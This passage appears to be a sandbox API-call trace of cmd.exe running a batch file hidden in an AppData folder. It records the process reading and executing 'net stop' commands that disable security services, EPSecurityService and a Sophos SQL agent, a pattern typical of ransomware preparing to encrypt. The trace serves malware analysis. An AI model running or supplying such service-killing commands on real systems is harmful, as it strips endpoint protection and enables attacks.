lpMode=0x4a9841b0) returned 1 [0039.494] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0039.494] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0039.494] SetConsoleInputExeNameW () returned 0x1 [0039.494] GetConsoleOutputCP () returned 0x1b5 [0039.495] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0039.495] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0039.495] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0039.495] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.495] SetFilePointer (in: hFile=0x78, lDistanceToMove=1350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x546 [0039.495] GetProcessHeap () returned 0x3e0000 [0039.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0039.495] GetProcessHeap () returned 0x3e0000 [0039.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0039.495] GetProcessHeap () returned 0x3e0000 [0039.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0039.495] GetProcessHeap () returned 0x3e0000 [0039.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0039.495] GetProcessHeap () returned 0x3e0000 [0039.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0039.495] GetProcessHeap () returned 0x3e0000 [0039.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0039.495] GetProcessHeap () returned 0x3e0000 [0039.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0039.495] GetProcessHeap () returned 0x3e0000 [0039.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0039.495] GetProcessHeap () returned 0x3e0000 [0039.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0039.495] GetProcessHeap () returned 0x3e0000 [0039.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0039.495] GetProcessHeap () returned 0x3e0000 [0039.496] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0039.496] GetProcessHeap () returned 0x3e0000 [0039.496] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0039.496] GetProcessHeap () returned 0x3e0000 [0039.496] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0039.496] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.496] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x546 [0039.496] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x137b, lpOverlapped=0x0) returned 1 [0039.496] SetFilePointer (in: hFile=0x78, lDistanceToMove=1381, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x565 [0039.496] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=31, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop EPSecurityService /y\r\n /y\r\n\r\nerviceΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 31 [0039.496] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.496] GetFileType (hFile=0x78) returned 0x1 [0039.496] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.496] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x565 [0039.496] GetProcessHeap () returned 0x3e0000 [0039.496] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fcad8 [0039.496] GetProcessHeap () returned 0x3e0000 [0039.496] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcad8 | out: hHeap=0x3e0000) returned 1 [0039.497] _tell (_FileHandle=3) returned 1381 [0039.497] _close (_FileHandle=3) returned 0 [0039.497] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0039.497] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0039.497] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0039.497] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0039.497] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0039.497] _wcsicmp (_String1="net", _String2="CD") returned 11 [0039.497] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0039.497] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0039.497] _wcsicmp (_String1="net", _String2="REN") returned -4 [0039.497] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0039.497] _wcsicmp (_String1="net", _String2="SET") returned -5 [0039.497] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0039.497] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0039.497] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0039.497] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0039.497] _wcsicmp (_String1="net", _String2="MD") returned 1 [0039.497] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0039.497] _wcsicmp (_String1="net", _String2="RD") returned -4 [0039.497] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0039.497] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0039.497] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0039.497] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0039.497] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0039.497] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0039.497] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0039.498] _wcsicmp (_String1="net", _String2="VER") returned -8 [0039.498] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0039.498] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0039.498] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0039.498] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0039.498] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0039.498] _wcsicmp (_String1="net", _String2="START") returned -5 [0039.498] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0039.498] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0039.498] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0039.498] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0039.498] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0039.498] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0039.498] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0039.498] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0039.498] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0039.498] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0039.498] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0039.498] SetErrorMode (uMode=0x0) returned 0x1 [0039.498] GetProcessHeap () returned 0x3e0000 [0039.498] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0039.498] GetProcessHeap () returned 0x3e0000 [0039.498] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0039.498] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.498] GetProcessHeap () returned 0x3e0000 [0039.498] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0039.498] GetProcessHeap () returned 0x3e0000 [0039.498] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0039.498] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0039.498] GetProcessHeap () returned 0x3e0000 [0039.498] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0039.498] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.499] GetProcessHeap () returned 0x3e0000 [0039.499] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0039.499] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0039.499] GetProcessHeap () returned 0x3e0000 [0039.499] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0039.499] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.499] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.499] GetLastError () returned 0x2 [0039.499] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.499] GetLastError () returned 0x2 [0039.499] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.499] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.499] GetLastError () returned 0x2 [0039.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.500] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.500] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.500] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0039.500] SetErrorMode (uMode=0x0) returned 0x1 [0039.500] GetProcessHeap () returned 0x3e0000 [0039.500] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0039.500] GetProcessHeap () returned 0x3e0000 [0039.500] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0039.500] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.500] GetProcessHeap () returned 0x3e0000 [0039.500] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0039.500] GetProcessHeap () returned 0x3e0000 [0039.500] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0039.500] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0039.500] GetProcessHeap () returned 0x3e0000 [0039.500] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0039.500] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.500] GetProcessHeap () returned 0x3e0000 [0039.500] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0039.500] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0039.500] GetProcessHeap () returned 0x3e0000 [0039.500] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0039.500] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.501] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.501] GetLastError () returned 0x2 [0039.501] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.501] GetLastError () returned 0x2 [0039.501] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.501] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0039.501] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0039.501] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.501] GetLastError () returned 0x2 [0039.501] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0039.501] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0039.501] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.502] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0039.502] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0039.502] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0039.502] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0039.502] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop EPSecurityService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop EPSecurityService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop EPSecurityService /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x80c, dwThreadId=0x810)) returned 1 [0039.505] CloseHandle (hObject=0x78) returned 1 [0039.505] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0039.505] GetProcessHeap () returned 0x3e0000 [0039.505] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.505] GetEnvironmentStringsW () returned 0x3f8408* [0039.506] GetProcessHeap () returned 0x3e0000 [0039.506] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.506] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.506] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0039.651] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0039.661] CloseHandle (hObject=0x74) returned 1 [0039.666] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0039.666] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0039.666] GetProcessHeap () returned 0x3e0000 [0039.666] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.666] GetEnvironmentStringsW () returned 0x3f8408* [0039.667] GetProcessHeap () returned 0x3e0000 [0039.667] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.667] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.667] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0039.667] GetProcessHeap () returned 0x3e0000 [0039.667] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.667] GetEnvironmentStringsW () returned 0x3f8408* [0039.667] GetProcessHeap () returned 0x3e0000 [0039.667] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.667] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.667] GetProcessHeap () returned 0x3e0000 [0039.667] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0039.667] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0039.667] _get_osfhandle (_FileHandle=1) returned 0x264 [0039.667] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0039.667] _get_osfhandle (_FileHandle=1) returned 0x264 [0039.667] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0039.667] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0039.667] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0039.668] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0039.668] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0039.668] SetConsoleInputExeNameW () returned 0x1 [0039.668] GetConsoleOutputCP () returned 0x1b5 [0039.668] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0039.668] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0039.668] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0039.668] _get_osfhandle (_FileHandle=3) returned 0x74 [0039.668] SetFilePointer (in: hFile=0x74, lDistanceToMove=1381, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x565 [0039.668] GetProcessHeap () returned 0x3e0000 [0039.668] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0039.668] GetProcessHeap () returned 0x3e0000 [0039.668] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0039.668] GetProcessHeap () returned 0x3e0000 [0039.668] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0039.669] GetProcessHeap () returned 0x3e0000 [0039.669] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0039.669] GetProcessHeap () returned 0x3e0000 [0039.669] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0039.669] GetProcessHeap () returned 0x3e0000 [0039.669] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0039.669] GetProcessHeap () returned 0x3e0000 [0039.669] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0039.669] GetProcessHeap () returned 0x3e0000 [0039.669] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0039.669] GetProcessHeap () returned 0x3e0000 [0039.669] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0039.669] GetProcessHeap () returned 0x3e0000 [0039.669] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0039.669] GetProcessHeap () returned 0x3e0000 [0039.669] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0039.669] GetProcessHeap () returned 0x3e0000 [0039.669] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0039.669] GetProcessHeap () returned 0x3e0000 [0039.669] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0039.669] _get_osfhandle (_FileHandle=3) returned 0x74 [0039.669] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x565 [0039.669] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x135c, lpOverlapped=0x0) returned 1 [0039.669] SetFilePointer (in: hFile=0x74, lDistanceToMove=1410, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x582 [0039.669] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=29, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$SOPHOS /y\r\n\r\n /y\r\n\r\nerviceΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 29 [0039.669] _get_osfhandle (_FileHandle=3) returned 0x74 [0039.669] GetFileType (hFile=0x74) returned 0x1 [0039.669] _get_osfhandle (_FileHandle=3) returned 0x74 [0039.669] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x582 [0039.669] GetProcessHeap () returned 0x3e0000 [0039.670] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fcad8 [0039.670] GetProcessHeap () returned 0x3e0000 [0039.670] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcad8 | out: hHeap=0x3e0000) returned 1 [0039.670] _tell (_FileHandle=3) returned 1410 [0039.670] _close (_FileHandle=3) returned 0 [0039.670] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0039.670] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0039.670] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0039.670] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0039.670] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0039.670] _wcsicmp (_String1="net", _String2="CD") returned 11 [0039.670] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0039.670] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0039.670] _wcsicmp (_String1="net", _String2="REN") returned -4 [0039.670] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0039.670] _wcsicmp (_String1="net", _String2="SET") returned -5 [0039.670] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0039.670] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0039.670] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0039.670] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0039.671] _wcsicmp (_String1="net", _String2="MD") returned 1 [0039.671] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0039.671] _wcsicmp (_String1="net", _String2="RD") returned -4 [0039.671] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0039.671] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0039.671] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0039.671] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0039.671] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0039.671] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0039.671] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0039.671] _wcsicmp (_String1="net", _String2="VER") returned -8 [0039.671] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0039.671] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0039.671] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0039.671] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0039.671] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0039.671] _wcsicmp (_String1="net", _String2="START") returned -5 